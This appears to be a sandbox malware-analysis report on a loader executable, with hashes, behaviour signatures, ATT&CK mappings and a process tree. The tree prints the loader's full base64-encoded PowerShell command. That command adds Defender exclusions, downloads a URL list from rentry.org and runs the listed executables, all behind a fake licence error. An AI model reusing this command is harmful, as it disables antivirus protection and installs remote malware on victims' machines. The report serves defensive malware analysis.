7d1943592ad97eef3c6b0add5e16e0055cf0a0586910c7ffcde7530be8058353

General

Target

zz00Loader.exe
Size

6KB
MD5

5c2dc1e0aabd5e29ff2a3913df38e9b7
SHA1

0479daf9f6082b1ee3ce3ae2fba241d14f5e4de3
SHA256

7d1943592ad97eef3c6b0add5e16e0055cf0a0586910c7ffcde7530be8058353
SHA512

702d96551746a81b6c4810d9a942a2605d25ec49de3431b4b3110de4c451bace1ed191df84aeafa34420a224da4fb70094902e67d724ca110ae437c7e5229b42
SSDEEP

96:3gd8AMolHFyFZjUsrLRlS+S/HD812hNyhh9AxHTdDd3ojZ78rl:wuAMollyFZosrLRlSB/HDu2hNqh9A5TV

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/887bn/raw

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	1996	powershell.exe
5	1996	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1996	powershell.exe
1996	powershell.exe
368	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	368	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1060 wrote to memory of 1996	1060	zz00Loader.exe	27
PID 1060 wrote to memory of 1996	1060	zz00Loader.exe	27
PID 1060 wrote to memory of 1996	1060	zz00Loader.exe	27
PID 1060 wrote to memory of 1996	1060	zz00Loader.exe	27
PID 1996 wrote to memory of 368	1996	powershell.exe	29
PID 1996 wrote to memory of 368	1996	powershell.exe	29
PID 1996 wrote to memory of 368	1996	powershell.exe	29
PID 1996 wrote to memory of 368	1996	powershell.exe	29

C:\Users\Admin\AppData\Local\Temp\zz00Loader.exe
"C:\Users\Admin\AppData\Local\Temp\zz00Loader.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1060
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAdwBkACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGUAbgB4ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAATABpAGMAZQBuAHMAZQAgAGQAZQB0AGUAYwB0AGUAZAAuACAASQBuACAAbwByAGQAZQByACAAdABvACAAZwBlAHQAIABhACAAbABpAGMAZQBuAHMAZQAsACAAYwBvAG4AbgBlAGMAdAAgAHkAbwB1AHIAIABTAHQAZQBhAG0AIABhAGMAYwBvAHUAbgB0ACAAdwBpAHQAaAAgAG8AdQByACAAQQBuAHQAaQAtAEwAZQBhAGsAIABzAGkAdABlAC4AIAAxACAAYQBjAGMAbwB1AG4AdAAgAGMAYQBuACAAaABhAHYAZQAgAG8AbgBsAHkAIAAxACAAbABpAGMAZQBuAHMAZQAhACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwByAGoAaAAjAD4AOwAiADsAPAAjAGcAaAByACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQBhAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbgBiAGUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdgB3AGsAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvADgAOAA3AGIAbgAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAaQBjAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBxAHcAeQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB5AGMAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAcABqAHQAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbQB4AGcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG0AZwBoACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB6AGwAdQAjAD4A"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1996
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#enx#>[System.Windows.Forms.MessageBox]::Show('No License detected. In order to get a license, connect your Steam account with our Anti-Leak site. 1 account can have only 1 license!','','OK','Error')<#rjh#>;
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:368

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
81a78fe4a5e34fab4815be55754fcbc3

SHA1
d3c6998958342816f87317e9feac914f49af7f93

SHA256
a9058e50566e333c1b7d2a064ee73910a712aaf65d9a826b879653d7ba49d16d

SHA512
0d1d0ee6fa3a425095dd51d628bb975637da931d51a5205f578af106eb367b109118f88463f2f3fcc10c2483eb7877a9b5d2cbe0b4f2a6de883e9c9639e66566

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
81a78fe4a5e34fab4815be55754fcbc3

SHA1
d3c6998958342816f87317e9feac914f49af7f93

SHA256
a9058e50566e333c1b7d2a064ee73910a712aaf65d9a826b879653d7ba49d16d

SHA512
0d1d0ee6fa3a425095dd51d628bb975637da931d51a5205f578af106eb367b109118f88463f2f3fcc10c2483eb7877a9b5d2cbe0b4f2a6de883e9c9639e66566

Download Submit
memory/368-63-0x0000000002480000-0x00000000024C0000-memory.dmp

Filesize
256KB

Download
memory/1996-57-0x00000000026B0000-0x00000000026F0000-memory.dmp

Filesize
256KB

Download
memory/1996-56-0x00000000026B0000-0x00000000026F0000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing